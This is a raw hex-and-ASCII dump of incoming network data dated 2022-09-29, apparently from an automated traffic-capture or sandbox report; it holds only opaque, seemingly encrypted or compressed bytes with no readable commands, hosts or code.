                                                                                                                                                    2022-09-29 12:59:00 UTC2919INData Raw: 3f 36 f3 94 f9 ba bd 1a 84 27 3a 37 fc 46 75 dd 60 20 a3 c2 c5 0c c6 1b 1e 33 7c 15 e1 b2 96 0c 5d a9 dc 0f aa 02 ef ba de 56 43 4f a0 87 45 34 3e 80 3a da 34 16 35 f4 5e 30 20 0e 8c 33 03 9c 38 d7 a1 cf 1e ac e8 13 26 8c ff 0c 32 37 80 b4 31 f4 50 db e7 67 04 60 99 0d 5c f9 00 ba 6c fc b3 0f bf 2c 7a 70 9a c3 79 9f 99 73 e8 d9 e0 dd c0 96 0e 07 d7 8e af 19 65 87 57 a5 e1 d9 17 85 bc 77 6f 37 a4 9f 26 9a db 2b 5e 4a 4e 3c d1 d4 5e 09 1c 1b 3a 13 e0 ea fc 8d f3 db 7f 5e de b2 3c b1 81 1e 6d 4b 10 ba 81 4e f1 58 97 3c 4c 04 85 28 19 0f 55 b4 e1 a0 31 ac 9d 4c 41 65 99 c1 f1 f0 d8 5c 57 59 a8 63 52 40 64 13 0f 07 e7 1b 58 ee 8d 18 02 76 16 4b f5 d6 12 85 27 4b 5b b9 2a e4 a7 42 79 f4 ed f9 84 c8 00 c7 bb 6b f6 3c 94 ac b9 70 28 2b 7b b4 04 d9 08 ab ec 30 6d
                                                                                                                                                    Data Ascii: ?6':7Fu` 3|]VCOE4>:45^0 38&271Pg`\l,zpyseWwo7&+^JN<^:^<mKNX<L(U1LAe\WYcR@dXvK'K[*Byk<p(+{0m
                                                                                                                                                    2022-09-29 12:59:00 UTC2935INData Raw: b3 7a ea ac 39 ed 8e 64 00 ad 06 c6 d2 e9 ff ed 70 fd 94 a9 66 82 73 b5 a4 05 92 20 72 0b 52 8d cd c5 dc 87 33 46 3f 43 3d 46 32 95 31 fc f0 ba ec ef 24 d6 28 92 c5 91 ed b1 d4 93 32 22 1d 69 92 ff 5f e3 86 52 39 83 8b e9 01 9c 1c e6 13 2e 24 ae 4e ab 25 6b 41 9d 4b ac 4e 17 60 81 86 90 d4 b7 72 7e 60 dc de 27 ac fd ae 7e 5b 0f 68 50 69 df 5c 05 ef 3b d4 07 0f de da dc 9f 6d 3d 12 7b f6 d9 65 e6 ec e0 36 db 45 fd 58 10 19 6b 49 a1 16 fe 36 75 0b 8f 2e 66 54 1f 38 1a bb dd 36 dc 9a 76 40 0c 17 d0 e9 6c 9b 49 45 04 78 fc 8c f2 06 68 05 25 81 13 ee 6a 49 df 0e 92 06 98 86 28 49 ca c2 86 9e 28 18 42 e8 43 92 7a 41 6f b0 6f b0 9d c7 20 0e 2b 6e 1f dd 25 f1 a2 62 77 d8 1f 98 00 59 76 2c 2a bb e6 19 59 2d 47 13 8f 7e 3c b3 17 92 0d 44 d3 f1 67 74 de 22 bd b0 18
                                                                                                                                                    Data Ascii: z9dpfs rR3F?C=F21$(2"i_R9.$N%kAKN`r~`'~[hPi\;m={e6EXkI6u.fT86v@lIExh%jI(I(BCzAoo +n%bwYv,*Y-G~<Dgt"
                                                                                                                                                    2022-09-29 12:59:00 UTC2951INData Raw: bf 06 03 c9 71 dd 6c fe 2e f3 1e a7 2e 9c 8e 27 6e 69 6e 1d db d5 10 4d 38 e8 0f 29 80 d9 88 4f 9f 71 55 7f f8 f2 59 68 e9 90 7c b0 e8 46 12 4f b2 da 51 d3 ef f0 30 f9 aa bf fc 86 ea 18 54 88 9e 76 10 60 fb 7d 3a f9 7c a2 5f 9f 4e 17 23 99 5e 77 47 8d a8 05 08 d5 92 55 ee 14 f6 4e 16 41 fa a0 4f 54 f8 4b 9d 7a ca 6d e3 76 9d 90 23 ef 32 3e 8e d4 ea 57 f7 c7 e7 84 d8 1d c8 7b 85 31 d3 a1 6c e4 93 be 90 34 a5 4b 0c f5 0a 66 29 09 cc a0 8b 85 49 6f 1d 7e 73 45 c6 07 5d 4e 47 aa 94 cd 18 ab 0c 43 73 b0 5b 89 45 ca e5 34 49 7e 3b bf e7 6d 13 24 41 26 49 3a e1 5d d3 aa f5 23 54 54 5d e6 40 ba fa b8 c0 31 d2 90 cf 2f 3f 4a 46 17 f6 66 5f 6b 60 7b 23 31 a0 7b 17 6e 3c 63 74 d3 2a 58 30 19 0e 0f 9e 73 68 c2 61 5c e9 a8 19 47 8b da b1 63 67 66 34 b0 a0 19 58 9d 90
                                                                                                                                                    Data Ascii: ql..'ninM8)OqUYh|FOQ0Tv`}:|_N#^wGUNAOTKzmv#2>W{1l4Kf)Io~sE]NGCs[E4I~;m$A&I:]#TT]@1/?JFf_k`{#1{n<ct*X0sha\Gcgf4X
                                                                                                                                                    2022-09-29 12:59:00 UTC2967INData Raw: 25 46 a8 14 f3 9a 55 a2 a6 24 49 f1 35 05 c4 cc de 54 2e 34 b7 b0 c1 8d e2 a6 b2 0e ed 25 e2 78 9a 54 65 72 4f 7f 47 87 e1 fb d1 f9 bd 68 36 ca f2 9c 13 0e 52 08 b6 c7 b1 f3 39 fc 31 2a 26 13 ab b8 8e 54 71 48 4d 96 18 ea 38 69 05 9b 9b ac 0a f5 bc 7a 1c 43 e2 27 1b 3b de 01 3b 02 4a 53 12 c7 6a eb 87 53 3a 72 44 4a 33 bc ca 98 12 c4 17 77 33 06 1d 47 f0 dd 33 ea 19 0c f6 58 12 3e 8b dd 86 95 01 7c 7e fe b4 6b 91 7a 57 da ac d0 6d a5 3b c5 da d7 06 b1 93 be df e0 af f3 97 45 70 5d e3 c1 4a 18 cd ec 1f 46 e6 df 72 8c 97 c0 06 bb fb 00 42 e5 69 8a 32 fa 95 a6 71 57 6e 1b 30 a9 2a a4 16 85 1c 1a 23 92 dc 03 94 d6 39 b0 66 a7 bc d7 51 a1 c1 2c 89 b0 86 f9 98 6d 11 f6 f1 42 cc 85 2a 3e 9b 0e 2c 8f 3e 70 c4 63 d9 e7 af 14 b1 2c 20 af 0b 71 86 b2 df bd fb dc 96
                                                                                                                                                    Data Ascii: %FU$I5T.4%xTerOGh6R91*&TqHM8izC';;JSjS:rDJ3w3G3X>|~kzWm;Ep]JFrBi2qWn0*#9fQ,mB*>,>pc, q
                                                                                                                                                    2022-09-29 12:59:00 UTC2983INData Raw: e7 ed e7 b7 65 ed 89 d6 92 43 c2 b4 bc 41 80 08 9a 77 60 2f a2 fe ce 02 89 a1 d7 b5 6f ab 21 0d 53 ad a5 0d 88 12 98 f0 dc 05 78 46 93 06 96 4a 96 8a 55 11 28 ba e1 9c a8 a3 9f 25 41 c7 63 21 b8 bb 91 1b c3 3e c0 9a bd 38 c6 b0 6f c2 3d 81 dd 07 87 9e 4e b4 24 01 d5 09 e2 a0 37 f9 f4 c3 f6 23 17 1e 12 69 6c ff 6b 0c 38 09 a1 95 b7 dc 0d 81 a3 66 9a f3 6f 22 d4 ae 79 1a 08 f6 0b 63 35 1c 6a b0 c9 34 d5 9e 6e 36 c8 f6 22 72 e3 e9 93 62 d1 38 94 7e 3f 83 02 4f 25 08 eb b8 fe eb 11 23 fb 89 74 ec 97 ca 15 16 f6 10 e2 77 9c 58 9b e5 4b 34 f9 c8 f0 d7 13 dd ec 74 3a ea e6 49 d3 13 e5 56 58 75 4f f9 a2 6a bc d5 f1 e5 e1 a4 c9 ae da 7e 68 87 b3 a5 80 be bf e7 c4 5d 79 b2 2c b9 1b b1 c7 5d 36 b3 75 05 9c 32 1b b4 ce ea d6 6d 16 a9 a2 de 13 09 ea 98 4f 28 53 dd b5
                                                                                                                                                    Data Ascii: eCAw`/o!SxFJU(%Ac!>8o=N$7#ilk8fo"yc5j4n6"rb8~?O%#twXK4t:IVXuOj~h]y,]6u2mO(S
                                                                                                                                                    2022-09-29 12:59:00 UTC2999INData Raw: 8b c1 c7 b7 19 77 5b ab dd db 4b b5 51 55 83 54 01 ff 0b 65 0b 0f 9e 06 6c 4e 26 c4 16 b8 d5 a1 1f 60 75 be 88 2c c5 0c 0b bc c7 98 7a ac b2 4d 9d ae 06 33 41 35 9c 38 d6 9b e9 42 5d b4 b2 ce 93 cc c8 a9 4a 1b 59 0c 01 45 18 bb e0 bc 0f 97 37 23 d0 38 44 46 12 1a 84 b4 ca d2 5c 4e 49 d5 19 86 b1 f3 e8 37 f4 5b 73 21 a1 4b 99 54 85 c3 80 4c 22 f3 5f 00 84 cf 3c 7b f7 f1 56 7d 81 79 0a b4 72 15 e2 5d ee 21 0d 75 c6 aa ff 4f 7b a2 d2 51 22 cf ae ab e5 5e 46 9f 53 6a 86 ca 3d 49 ff 31 af 84 36 88 70 45 35 1a e0 2b 5f 8b 43 4f 13 2c 5f ea e7 81 f6 61 ad cc 07 29 ee 4e c6 ea 31 27 7d f0 d3 5c a6 f3 8e f5 b6 15 9c aa 2e 0e 51 7b 55 82 33 f3 93 09 ec db 93 b1 fb 67 aa 7d 80 8a cf fa e8 90 e3 b6 02 49 25 50 3b 5d b2 d5 1f d6 e9 a8 26 a1 bf b2 46 31 80 cb c8 4d 6d
                                                                                                                                                    Data Ascii: w[KQUTelN&`u,zM3A58B]JYE7#8DF\NI7[s!KTL"_<{V}yr]!uO{Q"^FSj=I16pE5+_CO,_a)N1'}\.Q{U3g}I%P;]&F1Mm
                                                                                                                                                    2022-09-29 12:59:00 UTC3015INData Raw: 67 ee 6a 64 63 0f bc 78 b9 71 5c f5 93 75 a3 83 3e 65 40 ee 25 18 14 5a 45 94 c3 c3 3f e3 d2 15 b7 bc 3c 70 42 36 3f e2 c3 23 b5 8d 84 2e 5b e5 17 17 dd 63 12 17 d1 57 cf 26 b4 1a db d2 0e 75 ff 9c 08 c0 0b 61 0a 47 aa 5f 81 e6 3d 35 57 fb 24 bd b1 65 be a4 88 fc 66 12 ac 80 0e d5 62 6b 79 b9 b5 7b 70 8d 44 82 a2 8e ea c6 e7 3a 78 92 1e 34 79 3c cb b7 9c 2f 8a f0 87 6a 3c 0f 1c 8e 09 14 95 e1 42 99 37 9e 0e 04 44 9e c5 89 e5 fe 48 f8 1d 3d af 39 0b 75 54 3f eb 8b c0 99 18 3b 7f f1 8d e1 e0 0d b3 43 1c de 86 aa 12 6b 83 51 9e 00 77 e9 1d 30 2f 8c 6c 30 6a 66 9d d5 72 86 0b 7b ce 33 af 7b 04 68 00 b4 56 1c 24 15 c3 d3 44 e4 10 9a b6 02 61 64 42 70 87 d0 94 bf b2 bf 98 53 5a e1 44 72 4f 23 8c 47 f6 db eb 50 a7 2d b3 98 21 d6 7b 5e 8a 5a 6f aa d3 90 15 2e 75
                                                                                                                                                    Data Ascii: gjdcxq\u>e@%ZE?<pB6?#.[cW&uaG_=5W$efbky{pD:x4y</j<B7DH=9uT?;CkQw0/l0jfr{3{hV$DadBpSZDrO#GP-!{^Zo.u
                                                                                                                                                    2022-09-29 12:59:00 UTC3031INData Raw: ff 44 4a 00 9e 70 67 d2 d3 6f 3a 65 03 f6 06 06 4d 3c ef 0e 5b ae be d0 27 db 1d c9 e0 7a 22 7a bb 45 6e 70 b6 0d d9 16 f8 fe a0 e3 90 95 c2 20 f1 d1 93 2f 30 44 dd ae ec c7 be 50 ce 75 dc f2 99 cd e6 8f 66 f6 88 67 7f 13 fe c7 a7 09 50 ed 46 99 a5 61 c8 5f 53 4e 51 16 08 9f 6c f4 8f 23 e9 09 9b 2b a0 3b 57 66 3b 05 d9 9a ff 76 75 78 1b 8a e0 38 71 25 df a6 7e 56 7a 4b 14 a1 dd 03 7d 18 c8 95 53 40 6b e1 c3 de 52 b8 55 b9 66 ed ab 11 37 0b b3 c4 64 d6 4c 65 8a fb 99 3c 07 e9 e2 6f 17 c2 9b d1 c2 b2 a9 aa fa d3 7a 64 42 5e 1d be e0 a4 d5 d9 a9 67 3a 9c 9a c9 38 c9 5a 25 1f 66 4b ad 41 7f fa 14 1f 44 44 8a ba 39 c8 e0 0b 0a 9c e7 28 ed 0b d7 96 f9 b2 0a eb dd 1d cd 23 a1 d4 44 ff a8 c0 64 4b a8 45 4f 33 fd 80 4e d4 b7 29 ad 16 79 d7 62 dd fd 0a 99 dd da 22
                                                                                                                                                    Data Ascii: DJpgo:eM<['z"zEnp /0DPufgPFa_SNQl#+;Wf;vux8q%~VzK}S@kRUf7dLe<ozdB^g:8Z%fKADD9(#DdKEO3N)yb"
                                                                                                                                                    2022-09-29 12:59:00 UTC3047INData Raw: 0b c3 d1 62 bb 9d d8 2e 06 e5 23 ad 84 e7 5d d5 32 75 15 ad 85 ab 3a 25 79 63 ca 53 a8 de 3d 26 93 c0 6e 0e 1e 84 1d 84 ca 00 dc 4e d0 e5 df 8f 4b b9 b2 03 24 09 86 21 09 6f 4f 19 58 1d 27 bb 8d 90 cd 40 c4 8e 91 93 31 60 2f 23 e7 8b 44 0c 1c 1e c4 64 c1 0d 79 28 a8 59 1a 4c c1 31 ca 36 02 70 37 63 9a 6d 1b e5 12 5b 32 76 0e d6 ab 11 b4 4a 6a d0 c2 5b 1f 7e e5 51 91 62 19 19 0b cd 68 07 28 ff ee b1 b8 28 7d e8 a4 24 b8 74 7f c8 69 47 b4 88 61 5d 9e a6 f5 bb 21 6a 7b 06 40 aa a1 fe 22 3e 23 c6 df 84 a6 72 cd b1 12 1b b5 0c 93 84 7f 4e 69 b7 a8 6d 92 76 f9 3e f2 83 25 f7 00 91 bb fb 6f 28 15 94 6e fe b1 7c d3 29 7f 81 a2 df d7 ac dd 51 dd ae a3 3f 6b 83 75 0d a0 41 af 5a f5 68 d0 bf 1e a8 3e 07 53 be 8f 3a 87 ee f4 ac de 94 5c dc 83 94 9b a2 f2 1b f5 6c 48
                                                                                                                                                    Data Ascii: b.#]2u:%ycS=&nNK$!oOX'@1`/#Ddy(YL16p7cm[2vJj[~Qbh((}$tiGa]!j{@">#rNimv>%o(n|)Q?kuAZh>S:\lH
                                                                                                                                                    2022-09-29 12:59:00 UTC3063INData Raw: 62 4b d6 53 dc 0c 37 68 88 2d 31 33 08 77 49 39 cc b2 c2 6f c2 ea 1e 02 99 14 7c 73 66 fc 65 db 22 35 22 60 1b 20 24 68 6c 1e 10 50 20 1d 84 58 f4 c3 01 4f a7 db 9b c2 ea 52 7a ad cc 85 f2 72 34 e8 28 70 14 06 53 69 d3 a1 64 07 51 7b dc d4 9f 1c 6e 90 c3 3c 05 0d b2 6a 03 c5 70 a5 27 3e 25 ac 01 ea cd 89 c2 2b b0 39 cc cc b1 c2 07 0c 74 c4 05 ae a0 7a da c5 49 05 70 63 98 62 ed 5a fd 4d f9 15 01 a4 b2 67 c4 5d fa 0f 52 ac 1a 9b e2 60 41 65 42 49 71 ef d0 e8 b1 49 4c 6c 80 2b 4e c2 fa 05 b8 99 f9 68 43 b2 67 f0 72 06 a0 5d d0 d2 87 4a 78 a0 d0 5e 8f f5 54 82 37 78 3a 36 0e 29 31 5f 12 e5 54 f3 13 2a 74 0f f0 67 ae d1 c8 39 eb 3b 51 58 cb c8 2c 85 64 df 73 b4 6d a7 dd 10 b4 6c 3b a9 4f 87 38 c8 f2 ce a0 b0 f2 0f 3a 32 41 da 05 33 75 c5 bd cb ed 76 a5 46 e2
                                                                                                                                                    Data Ascii: bKS7h-13wI9o|sfe"5"` $hlP XORzr4(pSidQ{n<jp'>%+9tzIpcbZMg]R`AeBIqILl+NhCgr]Jx^T7x:6)1_T*tg9;QX,dsml;O8:2A3uvF
                                                                                                                                                    2022-09-29 12:59:00 UTC3079INData Raw: 25 68 3e 37 46 ae 5a 1a bc 5e 7a 36 87 06 08 15 7e 3e e1 fb c9 6c bc e6 34 09 04 ba 23 e2 e4 ff f7 95 5a cc 68 de 4a b2 d6 c6 7d e8 19 0e f5 4d 6f 77 d8 d0 c6 5c ef c0 db 3a 0a c0 b8 85 ab 22 58 f0 fc 8a 6c 12 ba 8c 44 93 a3 e2 fc 82 93 81 b6 53 fe 64 68 f3 33 3c bd 15 45 75 05 21 3c 2b 8e fd b6 bd 72 4c 73 d1 48 d3 1d 3a d2 4c 89 2a 8c fb ce 8d de 86 74 fb 8e b8 ad 3b 6b 3a 25 0e 82 f9 0f 32 85 b2 0a f9 46 bf 33 5d ca 98 5a a7 82 05 62 4d 7f 3f 21 8a d4 fd 9d 84 cc 1c b6 e8 b9 1e f2 33 cc c2 f1 73 b0 73 b2 a5 f8 07 53 69 4b 08 73 23 0f 35 aa 87 2b 8f a3 17 62 a1 4a 9a 5c eb 70 d2 83 4c 8d 10 66 a1 20 23 38 74 b1 c9 38 68 7e 03 15 77 3d 91 09 80 5a a5 9b 72 82 b5 43 9b 18 00 86 c1 71 f6 c1 1d 3e 31 00 e0 1e 0d cf a4 c9 96 b9 8a f4 3a ff fa 15 2a 5f 92 03
                                                                                                                                                    Data Ascii: %h>7FZ^z6~>l4#ZhJ}Mow\:"XlDSdh3<Eu!<+rLsH:L*t;k:%2F3]ZbM?!3ssSiKs#5+bJ\pLf #8t8h~w=ZrCq>1:*_
                                                                                                                                                    2022-09-29 12:59:00 UTC3095INData Raw: 62 27 fe 1f 25 31 4a 85 36 03 08 cd c9 32 f1 5a 6b 5b 71 85 8f d4 16 78 8f 53 ac 1d 10 a6 ff 11 94 29 b4 7b 6b b2 dd 89 0d fc a8 3e 5e 77 12 bb b9 0e 7a 26 de fe 72 ea 56 51 c5 d4 94 03 04 40 c9 6b 81 2a 3c 4f 3b 34 0c db d0 72 55 64 3c 1a 95 a3 32 72 42 22 44 e0 2b 41 f0 7b 94 73 72 b5 0f a3 4b 61 55 a6 06 4e 4b 32 40 f5 98 23 34 a7 b1 7c 0f d8 b4 ee 71 39 f9 da ac 8a ce 82 e2 d6 f7 9f 56 cf 3d fe ba 46 ca be e4 c4 a3 a8 49 38 c7 ac 8d 46 90 c9 c1 13 1a f7 d7 14 3b 76 eb c8 b1 9c 23 26 3f 12 3d 46 53 40 a8 48 4e 7b 30 d7 12 0d 46 c8 25 bc 00 5d 32 e6 e0 7e 0d 13 45 57 da 2d a0 f5 20 77 17 07 5a 17 23 2f 46 60 a5 27 98 e3 5c 86 65 84 8c 76 db ec 01 31 d1 c6 c0 17 d4 9f 9d 59 64 e6 71 48 ca fb 3f d7 23 c5 d0 c9 47 d4 33 b0 56 1d dc 61 92 f9 92 ed 19 eb ac
                                                                                                                                                    Data Ascii: b'%1J62Zk[qxS){k>^wz&rVQ@k*<O;4rUd<2rB"D+A{srKaUNK2@#4|q9V=FI8F;v#&?=FS@HN{0F%]2~EW- wZ#/F`'\ev1YdqH?#G3Va
                                                                                                                                                    2022-09-29 12:59:00 UTC3111INData Raw: 47 0d c1 9e 71 c2 2a 18 8a 32 0a 0c 3f 80 7c aa e3 39 ba 75 0c ff 5a 93 c7 f7 eb 08 ec 51 fc 7a 55 79 8a 6c 2a 10 d3 08 ea c6 96 d0 19 54 e1 2f 67 5a 3f 24 69 b0 bd 84 d2 63 fd 63 7f 61 2f b2 bd 91 fd 1e 04 a3 8c 4a a5 b2 1d 92 09 91 55 ce 5b f4 f1 bf e5 d3 7f 13 dc e2 8e d1 fd 38 36 c5 34 8a fe 48 87 5a c1 62 d8 fd 2f f8 30 02 91 82 dd bc 15 0d 60 27 a4 99 b7 84 91 8f 4a 4d a8 1a 65 00 13 31 22 b5 cb ce a1 98 db 3f 5c f8 78 c7 a3 7f f6 57 f7 a1 cf 30 64 89 3d f8 bc 67 e3 6d 18 0e 21 00 ca c8 a0 6d eb 4c 7c 12 9e 23 2f a0 04 ca 6d e5 69 f5 8d db 51 cd d9 89 9b a5 c4 fb f0 27 e6 cd c6 02 1c dd 10 4e fd a1 26 13 ef 1a 8e c3 b0 cf be 3e b5 b5 96 b4 46 36 4f af 8b ce 88 12 ab 1f af 24 54 62 a7 51 28 f5 d7 82 33 b7 7d 60 87 ce 97 59 bc ab 9f 39 3f d5 6a da f2
                                                                                                                                                    Data Ascii: Gq*2?|9uZQzUyl*T/gZ?$icca/JU[864HZb/0`'JMe1"?\xW0d=gm!mL|#/miQ'N&>F6O$TbQ(3}`Y9?j
                                                                                                                                                    2022-09-29 12:59:00 UTC3127INData Raw: 42 d7 fd 59 02 54 e6 57 cf 44 69 7f 64 e8 f8 b0 59 f3 b2 68 73 4c f5 1c f8 1c ad 4f c2 a2 29 2d 74 2e ac 8a 02 6e a3 7a 33 31 12 b2 0c 90 96 70 17 bc 0c 74 31 81 41 cb 31 fb 26 1c 46 df 6b 9e 14 59 e1 c1 08 a0 75 b1 2a c8 1c 5e 17 c8 35 a6 f2 3f de 34 8a 19 c7 37 89 fc 29 95 e6 7c 8e f4 0f 11 5b 60 a7 67 ec e9 50 42 d2 a9 9e 23 9f 2d 88 ad 66 e7 0e e5 ab 43 81 d4 b5 bb 55 67 78 36 87 d9 64 6d d3 4e 03 76 b7 ac 9e 0f 8d a7 c4 f0 dc 85 7a 00 55 f0 fb 3b df d7 78 b8 56 0a cd 55 84 af 97 98 65 73 a9 7f 35 5e 44 b1 bf 37 77 cc ac 3e 29 a3 e7 6a aa 79 c1 8c b6 57 bd 0c b5 1f 8e 76 05 ae dd ba 7f 68 6e 2c 47 13 8a ee ae 99 4d 4f 62 26 9c 1b dd 2b 15 d2 f7 ab 88 a5 0d c0 46 98 ca 2c 1a a8 17 42 02 77 ad dd 38 d5 7c 92 e2 c5 ad 0f ff 95 4d bf 13 43 61 6d fc 84 75
                                                                                                                                                    Data Ascii: BYTWDidYhsLO)-t.nz31pt1A1&FkYu*^5?47)|[`gPB#-fCUgx6dmNvzU;xVUes5^D7w>)jyWvhn,GMOb&+F,Bw8|MCamu
                                                                                                                                                    2022-09-29 12:59:00 UTC3143INData Raw: 83 77 c2 e7 39 0e 6f 47 cc 98 a4 fd ee 6c 07 56 a4 cd 60 97 dc a0 42 78 26 c3 03 de a0 14 0f 59 ce 3d 59 71 f6 ba d7 b5 db c0 4b 8e bf dc 2b 49 01 b3 bb f3 8b 5a db d0 c7 72 a6 23 2f 32 fc 0a 2c 47 94 e2 96 da 2e 7f 0d 6d 4c ce b3 de 9c 38 aa 72 2e 8e 89 51 7c df f4 13 bf 49 56 71 ac d1 8f 0a de f2 48 89 b9 ff c0 05 cf 79 c3 9f 33 fd 89 29 1a 9a ea 8e f2 99 6a 8b ca 9a 83 74 0a c4 75 48 40 1a e1 c9 c5 a1 10 d6 85 12 d1 54 83 5e bc ca e1 47 b9 b6 a7 39 cb f8 48 65 0e 12 b1 2c f8 3c 02 76 45 87 00 87 65 16 16 f4 16 37 5f 43 ce 83 6b 19 d4 f4 b7 fe 44 f3 00 f2 41 a8 fc bd 0e 15 14 3a 52 09 f5 43 18 70 15 d4 56 0c 4e b3 10 9a e5 d3 87 f2 1d 80 3b 0f f2 d4 48 91 9c fd 1a 25 1f 06 63 89 3d 8a e6 e8 fd 1a 66 91 65 4b 2a bd 8a ec 28 17 8a fd 8f 46 98 30 e6 01 4f
                                                                                                                                                    Data Ascii: w9oGlV`Bx&Y=YqK+IZr#/2,G.mL8r.Q|IVqHy3)jtuH@T^G9He,<vEe7_CkDA:RCpVN;H%c=feK*(F0O
                                                                                                                                                    2022-09-29 12:59:00 UTC3159INData Raw: 11 a1 97 7b 29 9b 06 6e 86 8e f7 1e 6d 8b d6 cc b9 b9 ab 6f a6 e7 31 47 5b 81 75 99 b0 02 1b 87 6e 24 55 21 c8 e8 24 b9 cd b5 de c6 aa 93 95 b3 95 0e 65 eb 2b a4 f9 1c df d7 bd 15 27 13 ed a2 9d e0 0d 08 b7 d6 02 b5 0b 55 bd 7c a0 d1 02 86 00 43 b2 ca 5b 3d 6c 66 6c a4 ad 2a 0c b3 c3 1c b2 8f ea 50 f1 75 be d4 84 2e dc f0 ee 4c 3d ea b3 ba f0 9f f4 33 44 51 5b 20 76 2c b8 45 13 00 44 9b bd 62 77 ec fc 36 82 8d ce fd b8 7a 28 2b 8b 84 cc 1f a3 cb bb 8e ff 39 f2 0b 5e 4d 6a 50 ca 07 69 b2 48 4a 0a d0 ec 54 13 a3 d5 8b 79 69 22 20 db 77 43 7b de 89 d1 00 d0 c4 f6 c9 4d e3 ec c1 19 58 dd 38 ff 35 87 b8 0a ab d5 5b 5e f3 4d f8 03 14 b9 bb 52 3b 71 ad f2 cd 09 ec 31 fc f7 93 76 78 86 71 c4 45 c5 63 fe e8 f0 ab 66 18 44 5d c9 9c 32 23 3a dd b9 1c 1f 45 ba c6 a1
                                                                                                                                                    Data Ascii: {)nmo1G[un$U!$e+'U|C[=lfl*Pu.L=3DQ[ v,EDbw6z(+9^MjPiHJTyi" wC{MX85[^MR;q1vxqEcfD]2#:E
                                                                                                                                                    2022-09-29 12:59:00 UTC3175INData Raw: 8b fc 10 08 8b 34 17 14 3f a1 06 28 6c e3 f1 57 a5 2f 7f f2 9f 8b f8 2a d7 83 4c ae 21 cc 6e db 98 24 6d 1c b0 e0 c0 94 5c c1 7b 65 34 8b cb cc 01 cc 30 2c c7 57 52 a3 23 27 53 12 da 4d 9f 48 6d b0 9e 17 86 44 cc 4e 4f 44 0b 09 b4 a3 40 a7 60 1c f9 35 67 8e 64 5f e8 1c cb 99 a8 97 09 a7 f9 6a e7 bd a3 4e 31 ae 4a b9 7b ef c5 aa 2c dd 21 7f 7e 08 8e fa a9 d8 d4 d7 c3 51 7b 2e c6 b7 3c 5d 1a 3f 64 25 6a 44 34 80 2f 93 52 8d fa 81 b6 34 d4 fc b1 a5 5c d4 46 d2 12 63 13 9c aa 08 ba ec 1a a8 ef 8b 6e 41 e0 f3 b7 fa 30 96 26 28 19 70 5d de cc cf 68 2d 33 38 0a 2b c4 99 45 cb 04 ba ad 34 0f 31 0f b7 7d 96 77 70 6c b9 8a 6d ce f1 48 06 58 1c 32 76 fc c9 08 03 6a c0 3e 70 e0 51 83 82 e1 0e 83 99 23 bc 46 a8 1f 61 56 63 9e da 33 98 f9 84 30 8a f5 3b cb 00 c4 cb c5
                                                                                                                                                    Data Ascii: 4?(lW/*L!n$m\{e40,WR#'SMHmDNOD@`5gd_jN1J{,!~Q{.<]?d%jD4/R4\FcnA0&(p]h-38+E41}wplmHX2vj>pQ#FaVc30;
                                                                                                                                                    2022-09-29 12:59:00 UTC3191INData Raw: 0f ef b6 72 c7 0d af 3b 04 9f 2e 15 59 2c 31 50 ac bc e7 a5 d0 08 84 e5 c6 21 14 ef 85 fe f9 53 46 43 6a 1c 56 af a3 d5 7b de 3b b2 3c e4 b0 5b 9a eb 9c 62 79 25 0b e8 45 a5 89 b2 31 04 59 4f b9 c8 e0 3c 73 61 d4 d8 0a 30 fe e5 27 3b fe b1 1b 3a 22 55 05 d9 dd 21 4f 43 97 db 86 29 e2 34 8f b1 47 ef 33 ea 23 8a bd 44 3a a3 0e 0e 35 93 6c 84 c9 b0 71 d2 a0 bf 97 e0 92 7f 74 a2 ca b9 e2 b8 df ab ef 4c aa d5 80 67 75 ae 97 f9 7f 1d d6 e8 fb 1a a5 51 b8 85 8e 35 5d 0b 90 05 70 0b ab 7a 67 f3 72 02 ec ef 67 11 1a 0b 1b df 61 55 9d 87 75 95 79 4c 18 2f f9 10 53 0e ff 7e d3 1a 81 de e4 d5 4e 36 20 a2 e4 ba 09 f6 8c ca ff af e7 c9 74 1e bb 37 7e 7a 17 c9 7c 87 62 f2 90 02 37 92 17 44 e9 62 b4 87 f2 06 e8 a6 94 bf 78 c2 68 f3 10 a5 7d 56 0c 41 4f 85 8c 1e 51 f6 cd
                                                                                                                                                    Data Ascii: r;.Y,1P!SFCjV{;<[by%E1YO<sa0';:"U!OC)4G3#D:5lqtLguQ5]pzgrgaUuyL/S~N6 t7~z|b7Dbxh}VAOQ
                                                                                                                                                    2022-09-29 12:59:00 UTC3207INData Raw: b6 ec 7c e6 16 92 4a df 67 3b 61 13 6a 53 e5 32 36 6d f8 13 3e da 47 ae 67 de c3 03 08 85 bd be 88 28 5b d8 72 c1 5d c6 40 01 af e4 d5 d2 b8 17 58 c0 98 00 5b 48 44 b2 33 41 39 38 ac 31 4d a6 51 6b 5e fe 09 db ed d1 4b d2 63 63 68 0e 26 09 f9 f2 60 8d 65 ee 03 5f 71 f5 67 6b a9 9c a0 d0 80 91 00 bd c0 a3 ce 88 2d 55 49 9e e7 fe 42 97 e5 55 32 82 22 b7 74 ec 61 d3 89 11 7d b9 24 ae 80 08 98 54 4b 44 55 d0 e8 97 57 51 e8 41 0b cb c1 02 20 2b 06 3c c0 dc 5a c8 21 4a 5d 6c c0 6d 1e 1e 82 b3 97 b3 4f 23 c5 dc e7 4e f2 7b 97 71 82 66 75 6a 0e 0c db 24 cf 2a 18 e5 8d e7 96 8d 5c dd e9 af 2b c9 aa cf b1 89 bf 9f 0a b7 1d 5c 37 a5 19 07 ad b3 7e 27 60 dd 00 d1 56 21 54 43 fc 61 37 15 3a 10 9b 12 82 f5 bc 0a 46 e4 85 0d 33 9c 6f 01 b0 6f 12 dd f8 b5 97 1b c7 f3 4e
                                                                                                                                                    Data Ascii: |Jg;ajS26m>Gg([r]@X[HD3A981MQk^Kcch&`e_qgk-UIBU2"ta}$TKDUWQA +<Z!J]lmO#N{qfuj$*\+\7~'`V!TCa7:F3ooN
